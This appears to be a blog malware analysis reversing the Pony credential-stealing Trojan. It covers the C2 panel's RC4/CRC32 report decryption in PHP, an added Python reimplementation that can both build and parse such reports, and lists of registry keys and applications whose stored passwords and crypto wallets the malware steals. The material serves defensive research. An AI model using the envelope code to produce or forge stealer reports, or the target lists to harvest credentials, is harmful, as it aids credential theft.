    return self::verify_new_file_header($data) || self::verify_old_file_header($data);
}
</pre>
Two header formats are supported, a new one and an old one, and both are checked in turn: the new format RC4-encrypts the header under a key sent in the first 4 bytes, the old format carries it in the clear.<br />
The header magic values are defined as follows:<br />
<pre style="font-family: Courier New;">
define("REPORT_HEADER", "PWDFILE0");         // each password report starts with this header
define("REPORT_PACKED_HEADER", "PKDFILE0");  // header indicating that report is packed
define("REPORT_CRYPTED_HEADER", "CRYPTED0"); // header indicating that report is encrypted
</pre>
Each header magic is 8 bytes long (strlen("PWDFILE0") is 8), so in the new format the first 4 bytes of the report are an RC4 key and the 8 bytes that follow are the header, RC4-encrypted under that key. The key travels with the report, so this layer hides the magic from casual inspection but gives no real secrecy:<br />
<pre style="font-family: Courier New;">
$rc4_key = substr($data, 0, 4);
$encrypted_header = substr($data, 4, $max_header_len);
$decrypted_header = rc4Decrypt($rc4_key, $encrypted_header);
</pre>
After the header check, another function, pre_decrypt_report(), is called to verify the integrity of the report and decrypt the rest of it:<br />
<pre style="font-family: Courier New;">
public static function pre_decrypt_report(&$data, $report_password = '')
{
    if (self::verify_new_file_header($data))
    {
        self::rand_decrypt($data);
    }
    if ((substr($data, 0, strlen(REPORT_CRYPTED_HEADER))) != REPORT_CRYPTED_HEADER)
        return false;
    if (strlen($data) == 0)
    {
        return false;
    } else if (strlen($data) < 12) // length cannot be less than 12 bytes (8-byte header + crc32 checksum)
    {
        return false;
    } else if (strlen($data) > REPORT_LEN_LIMIT)
    {
        return false;
    } elseif (strlen($data) == 12) // empty report
        return false;
    // extract crc32 checksum from datastream
    $crc_chk = data_int32(substr($data, strlen($data)-4));
    // remove crc32 checksum from the encrypted data stream
    $encrypted_data = substr($data, 0, -4);
    // check report validness
    $crc_chk = obf_crc32($crc_chk);
    if ((int)crc32($encrypted_data) != (int)$crc_chk)
    {
        return false;
    }
    $decrypted_data = rc4Decrypt($report_password, substr($encrypted_data, 8));
    // there's another crc32 checksum available to verify the decryption process
    // extract crc32 checksum from decrypted datastream
    $crc_chk = data_int32(substr($decrypted_data, strlen($decrypted_data)-4));
    // remove crc32 checksum from the data stream
    $decrypted_data_check = substr($decrypted_data, 0, -4);
    // check report validness
    $crc_chk = obf_crc32($crc_chk);
    if ((int)crc32($decrypted_data_check) != (int)$crc_chk)
    {
        return false;
    }
    $data = $decrypted_data;
    return true;
}
}
</pre>
In this function the header is verified again, then a 4-byte value is read from the end of the data stream. This is the CRC32 checksum of everything before it (the 8-byte header plus the ciphertext): the checksum is stripped and the CRC32 of the remainder is compared against it.<br />
<br />
Once the outer CRC32 matches, the data after the first 8 bytes is RC4-decrypted with a fixed key, $report_password, which the panel reads from its database:<br />
<pre style="font-family: Courier New;">
$pony_db_report_password = $pony_db->get_option('report_password', '', REPORT_DEFAULT_PASSWORD);
</pre>
Another CRC32 checksum is then read from the last 4 bytes of the decrypted stream and checked the same way, which also confirms that the key was correct.<br />
If the report is of the packed type it is then decompressed with aPLib; if it is a basic request, it is RC4-decrypted and parsed into a structure:<br />
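As an added example (this is not the Pony panel's or the malware's code), here is a Python reimplementation of the envelope logic above: the client-side wrapping and the panel-side checks of pre_decrypt_report(), so a captured gate.php POST body can be decoded offline once report_password is known. rand_decrypt(), data_int32() and obf_crc32() are not shown on the page; the code assumes rand_decrypt() strips the 4-byte key and RC4-decrypts the remainder with it, that checksums are stored little-endian, and that obf_crc32() adds no transformation. REPORT_LEN_LIMIT and the sample password, key and body are made up.

```python
"""Pony report envelope: RC4 + CRC32 layers as read by pre_decrypt_report().
Added example; assumptions about unseen panel helpers are marked inline."""
import struct
import zlib
from typing import Optional

REPORT_CRYPTED_HEADER = b"CRYPTED0"
REPORT_LEN_LIMIT = 1024 * 1024  # assumed; the real panel's limit is not shown on the page


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same keystream XOR."""
    if not key:
        raise ValueError("empty RC4 key")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def crc32_le(data: bytes) -> bytes:
    """CRC32 as the 4 bytes the envelope carries. data_int32()/obf_crc32() are not
    on the page; assumed to be a little-endian read with no extra obfuscation."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def build_report(plaintext: bytes, report_password: bytes,
                 rand_key: Optional[bytes] = None) -> bytes:
    """Client side: wrap plaintext the way pre_decrypt_report() expects.
    With a 4-byte rand_key the new format is produced, otherwise the old one."""
    inner = plaintext + crc32_le(plaintext)                     # inner CRC over plaintext
    body = REPORT_CRYPTED_HEADER + rc4(report_password, inner)  # header + ciphertext
    outer = body + crc32_le(body)                               # outer CRC over header + ciphertext
    if rand_key is None:
        return outer
    if len(rand_key) != 4:
        raise ValueError("rand_key must be 4 bytes")
    return rand_key + rc4(rand_key, outer)                      # per-report key layer, key in clear


def parse_report(data: bytes, report_password: bytes) -> bytes:
    """Panel side: the checks of pre_decrypt_report(), in order.
    Returns the plaintext or raises ValueError at the first failed check."""
    if data[:8] != REPORT_CRYPTED_HEADER:
        # New format: 4-byte RC4 key, then the RC4-encrypted old-format report.
        # rand_decrypt() is assumed to strip the key and decrypt the rest with it.
        if len(data) < 12:
            raise ValueError("too short for key + header")
        data = rc4(data[:4], data[4:])
        if data[:8] != REPORT_CRYPTED_HEADER:
            raise ValueError("bad header")
    if len(data) <= 12:                      # header + CRC32 only: empty report
        raise ValueError("empty report")
    if len(data) > REPORT_LEN_LIMIT:
        raise ValueError("report too large")
    encrypted = data[:-4]
    if crc32_le(encrypted) != data[-4:]:
        raise ValueError("outer CRC32 mismatch: report corrupted or tampered")
    decrypted = rc4(report_password, encrypted[8:])
    if len(decrypted) < 4:
        raise ValueError("decrypted payload too short for its CRC32")
    plaintext = decrypted[:-4]
    if crc32_le(plaintext) != decrypted[-4:]:
        raise ValueError("inner CRC32 mismatch: wrong report_password?")
    return plaintext


def is_valid_report(data: bytes, report_password: bytes) -> bool:
    """True when the report passes every check, i.e. what gate.php would act on."""
    try:
        parse_report(data, report_password)
        return True
    except ValueError:
        return False


# Constructed sample: password, per-report key and body are made up.
SAMPLE_PASSWORD = b"report-password"
SAMPLE_RAND_KEY = b"\x13\x37\xca\xfe"
SAMPLE_PLAINTEXT = b"constructed report body"

if __name__ == "__main__":
    blob = build_report(SAMPLE_PLAINTEXT, SAMPLE_PASSWORD, SAMPLE_RAND_KEY)
    print(len(blob), "bytes ->", parse_report(blob, SAMPLE_PASSWORD))
```

Two things worth noting. PHP's crc32() returns a signed value on 32-bit builds, which is why the panel casts both sides to (int) before comparing; the Python version masks to an unsigned 32-bit value instead. And nothing in this envelope authenticates the sender: RC4 under a password shared by every bot plus a CRC32 (a checksum, not a MAC) means anyone who recovers report_password from one panel can both decode and forge reports for it.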
<pre style="font-family: Courier New;">
// process report
ob_start(); // detect report processing noise
error_reporting(E_ALL);
$parse_result = $report->process_report($received_report_data, $pony_db_report_password);
$ob_data = trim(ob_get_contents());
error_reporting(0);
ob_end_clean();
</pre>
Before that, the panel checks whether the report ID is already present in the system and, if so, does not create a new ID for that report.<br />
It then fills the database from the decrypted data, using a call of the following form:<br />
<pre style="font-family: Courier New;">
$pony_db->update_parsed_report($report_id,
    $report->report_os_name, $report->report_is_win64,
    $report->report_is_admin, $report->report_hwid,
    $report->report_version_id, $url_list_array,
    $report->log->log_lines, $report->cert_lines,
    $report->wallet_lines, $email_lines);
</pre>
Let's now look at how Pony steals passwords. All the routines responsible for stealing stored credentials are referenced from a pointer array:<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2313_Reversingth1.png" /><br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2313_Reversingth2.png" /><br />
Let's look at the function responsible for stealing FFFTP passwords.<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2313_Reversingth3.png" /><br />
It first looks for the encoded stored passwords under the Software\\Sota\\FFFTP registry key, and once all the values have been found it decodes them with its own decoding routine:<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120815_2313_Reversingth4.png" /></div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-38672772288133385362015-12-31T14:46:00.000+05:302015-12-31T14:46:17.557+05:30Pony Trojan reversing (part-I)<div dir="ltr" style="text-align: left;" trbidi="on">
Pony is a credential-stealing Trojan that has been active for quite a while now. One campaign alone was tied to the theft of over $200,000 in bitcoins ( <a href="https://threatpost.com/latest-instance-of-pony-botnet-pilfers-200k-700k-credentials/104463/">https://threatpost.com/latest-instance-of-pony-botnet-pilfers-200k-700k-credentials/104463/</a> ). In this post we cover the reversing of the Pony Trojan.<br />
Tools required<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://cdn.shopify.com/s/files/1/0402/2761/products/my_gigantic_trojan_pony_ea6fb3e2-1be9-451b-8ce9-3e1fe60862eb.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://cdn.shopify.com/s/files/1/0402/2761/products/my_gigantic_trojan_pony_ea6fb3e2-1be9-451b-8ce9-3e1fe60862eb.jpg" height="320" width="256" /></a></div>
<br />
<ol>
<li>VMware</li>
<li>IDA Disassembler</li>
<li>OllyDbg Debugger</li>
<li>Hex editor</li>
</ol>
First, we examine its behaviour under dynamic analysis.<br />
<div>
<table border="0" style="border-collapse: collapse;">
<colgroup>
<col style="width: 120px;"></col>
<col style="width: 644px;"></col></colgroup>
<tbody valign="top">
<tr>
<td style="border: solid 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FILE NAME</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: solid 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">tt2.exe</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FILE SIZE</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">209408 bytes</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FILE TYPE</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">MD5</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">6245899b11a6bd6769b3656943322d13</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">SHA1</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">9879565d8c82e356cb7da62b9f04c3707cd3aac8</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">SHA256</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">15808f8e088503c7f9064dde9f328a9091bd71beef0f6557e013df11d46159a1</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">SHA512</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">1a0dd9df25e3bd03e80b1563fa13f71f536e353d06cc07ba52f6c40255ace7d13f909e319337e34ce0164a5c1c6c435569b4e3cdba1f02d82425ec42f58cf080</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">CRC32</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">906EA658</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">SSDEEP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">3072:zGYRxKHi2O9dXvuq+OqUkPdlvWjrcJUVRC169xF5VeOF8x0sk:zRTKHid6OWPdacJUVU6FeOe0D</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">YARA</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">None matched</span></td>
</tr>
</tbody>
</table>
</div>
Running it through Cuckoo, we get the following basic details about the sample:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/111915_0009_Reversingth1.png" /></div>
We now have an initial idea of what the malware does. It can be summarised as:<br />
<ol>
<li>Generates network traffic (it connects out to a remote host).</li>
<li>Has an anti-sandbox check (based on a time difference).</li>
<li>Hooks and reads browser data.</li>
<li>Hides itself in an alternate data stream (ADS).</li>
</ol>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/111915_0009_Reversingth2.png" /></div>
Let's look at some of the registry keys it reads or modifies:<br />
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar<br />
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar<br />
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar<br />
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar<br />
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar<br />
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar<br />
HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 9\QCToolbar<br />
HKEY_CURRENT_USER\Software\FlashFXP\3<br />
HKEY_CURRENT_USER\Software\FlashFXP<br />
HKEY_CURRENT_USER\Software\FlashFXP\4<br />
HKEY_LOCAL_MACHINE\Software\FlashFXP\3<br />
HKEY_LOCAL_MACHINE\Software\FlashFXP<br />
HKEY_LOCAL_MACHINE\Software\FlashFXP\4<br />
HKEY_CURRENT_USER\Software\FileZilla<br />
HKEY_CURRENT_USER\Software\FileZilla Client<br />
HKEY_LOCAL_MACHINE\Software\FileZilla<br />
HKEY_LOCAL_MACHINE\Software\FileZilla Client<br />
HKEY_CURRENT_USER\Software\BPFTP\Bullet Proof FTP\Main<br />
HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client\Main<br />
HKEY_CURRENT_USER\Software\BPFTP\Bullet Proof FTP\Options<br />
HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client\Options<br />
HKEY_CURRENT_USER\Software\BPFTP<br />
HKEY_CURRENT_USER\Software\TurboFTP<br />
HKEY_LOCAL_MACHINE\Software\TurboFTP<br />
HKEY_CURRENT_USER\Software\Sota\FFFTP<br />
HKEY_CURRENT_USER\Software\Sota\FFFTP\Options<br />
HKEY_CURRENT_USER\Software\CoffeeCup Software\Internet\Profiles<br />
HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites<br />
HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224<br />
HKEY_CURRENT_USER\Software\FTP Explorer\Profiles<br />
HKEY_CURRENT_USER\Software\VanDyke\SecureFX<br />
HKEY_CURRENT_USER\Software\Cryer\WebSitePublisher<br />
HKEY_CURRENT_USER\Software\ExpanDrive\Sessions<br />
HKEY_CURRENT_USER\Software\ExpanDrive<br />
HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts<br />
HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts<br />
HKEY_CURRENT_USER\SOFTWARE\NCH Software\Fling\Accounts<br />
HKEY_LOCAL_MACHINE\SOFTWARE\NCH Software\Fling\Accounts<br />
HKEY_CURRENT_USER\Software\FTPClient\Sites<br />
HKEY_LOCAL_MACHINE\Software\FTPClient\Sites<br />
HKEY_CURRENT_USER\Software\SoftX.org\FTPClient\Sites<br />
HKEY_LOCAL_MACHINE\Software\SoftX.org\FTPClient\Sites<br />
HKEY_CURRENT_USER\SOFTWARE\LeapWare<br />
HKEY_LOCAL_MACHINE\SOFTWARE\LeapWare<br />
HKEY_CURRENT_USER\Software\Martin Prikryl<br />
HKEY_LOCAL_MACHINE\Software\Martin Prikryl<br />
HKEY_CURRENT_USER\Software\South River Technologies\WebDrive\Connections<br />
HKEY_LOCAL_MACHINE\Software\South River Technologies\WebDrive\Connections<br />
As you can see, it is evidently looking for stored password related information. Apart from stored credentials, it also steals Bitcoin wallets. Following is the list of software it tries to steal from:<br />
<div style="text-align: center;">
<table border="0" style="border-collapse: collapse;">
<colgroup>
<col style="width: 165px;"></col>
<col style="width: 172px;"></col>
<col style="width: 113px;"></col></colgroup>
<tbody valign="top">
<tr>
<td style="border: solid 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">AR Manager</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: solid 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FTPGetter</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: solid 0.5pt; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Pocomail</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Total Commander</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">ALFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">IncrediMail</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">WS_FTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Internet Explorer</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">The Bat!</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">CuteFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Dreamweaver</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Outlook</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FlashFXP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">DeluxeFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Thunderbird</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FileZilla</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Google Chrome</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FastTrackFTP</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FTP Commander</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Chromium / SRWare Iron</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Bitcoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">BulletProof FTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">ChromePlus</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Electrum</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">SmartFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Bromium (Yandex Chrome)</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">MultiBit</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">TurboFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Nichrome</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FTP Disk</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FFFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Comodo Dragon</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Litecoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">CoffeeCup FTP / Sitemapper</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">RockMelt</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Namecoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">CoreFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">K-Meleon</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Terracoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FTP Explorer</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Epic</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Bitcoin Armory</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Frigate3 FTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Staff-FTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">PPCoin (Peercoin)</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">SecureFX</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">AceFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Primecoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">UltraFXP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Global Downloader</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Feathercoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FTPRush</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">FreshFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">NovaCoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">WebSitePublisher</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">BlazeFTP</span></td>
<td style="border-bottom: solid 0.5pt; border-left: none; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">Freicoin</span></td>
</tr>
<tr>
<td style="border-bottom: solid 0.5pt; border-left: solid 0.5pt; border-right: solid 0.5pt; border-top: none; padding-left: 9px; padding-right: 9px;"><span style="font-size: 10pt;">BitKinex</span></td>
